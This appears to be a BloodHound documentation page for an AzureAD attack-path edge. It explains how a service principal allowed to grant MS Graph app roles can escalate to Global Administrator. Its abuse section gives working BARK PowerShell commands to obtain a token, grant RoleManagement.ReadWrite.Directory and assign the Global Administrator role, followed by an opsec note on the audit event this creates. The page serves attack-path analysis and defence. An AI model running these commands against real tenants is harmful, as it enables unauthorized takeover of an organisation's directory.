This edge is created during post-processing. It is created against AzureAD tenant objects when a Service Principal has one of the following MS Graph app role assignments:
- AppRoleAssignment.ReadWrite.All
- RoleManagement.ReadWrite.Directory
Abuse Info
With the ability to grant arbitrary app roles, you can grant the RoleManagement.ReadWrite.Directory app role to a Service Principal you already control, and then promote it or another principal to Global Administrator.
These functions require you to supply an MS Graph-scoped JWT associated with the Service Principal that has the privilege to grant app roles. There are several ways to acquire a JWT. For example, you may use BARK’s Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT by supplying a Service Principal Client ID and secret:
$MGToken = Get-MSGraphTokenWithClientCredentials `
-ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `
-ClientSecret "asdf..." `
-TenantName "contoso.onmicrosoft.com"
Use BARK’s Get-AllAzureADServicePrincipals to collect all Service Principal objects in the tenant:
$SPs = Get-AllAzureADServicePrincipals `
-Token $MGToken
Next, find the MS Graph Service Principal’s ID. You can do this by piping $SPs to Where-Object, finding objects where the appId value matches the universal ID for the MS Graph Service Principal, which is 00000003-0000-0000-c000-000000000000:
$SPs | ?{$_.appId -Like "00000003-0000-0000-c000-000000000000"} | Select id
The output will be the object ID of the MS Graph Service Principal. Take that ID and use it as the “ResourceID” argument for BARK’s New-AppRoleAssignment function. The AppRoleID of ‘9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8’ is the universal ID for RoleManagement.ReadWrite.Directory. The SPObjectId is the object ID of the Service Principal you want to grant this app role to:
New-AppRoleAssignment `
-SPObjectId "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `
-AppRoleID "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" `
-ResourceID "9858020a-4c00-4399-9ae4-e7897a8333fa" `
-Token $MGToken
If successful, the output of this command will show you the App Role assignment ID. Now that your Service Principal has the RoleManagement.ReadWrite.Directory MS Graph app role, you can promote the Service Principal to Global Administrator using BARK’s New-AzureADRoleAssignment.
New-AzureADRoleAssignment `
-PrincipalID "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `
-RoleDefinitionId "62e90394-69f5-4237-9190-012177145e10" `
-Token $MGToken
If successful, the output will include the principal ID, the role ID, and a unique ID for the role assignment.
Opsec Considerations
When you assign an app role to a Service Principal, the Azure Audit logs will create an event called “Add app role assignment to service principal”. This event describes who made the change, what the target service principal was, and what app role assignment was granted.
References
- https://attack.mitre.org/techniques/T1098/
- https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5
- https://github.com/BloodHoundAD/BARK
Updated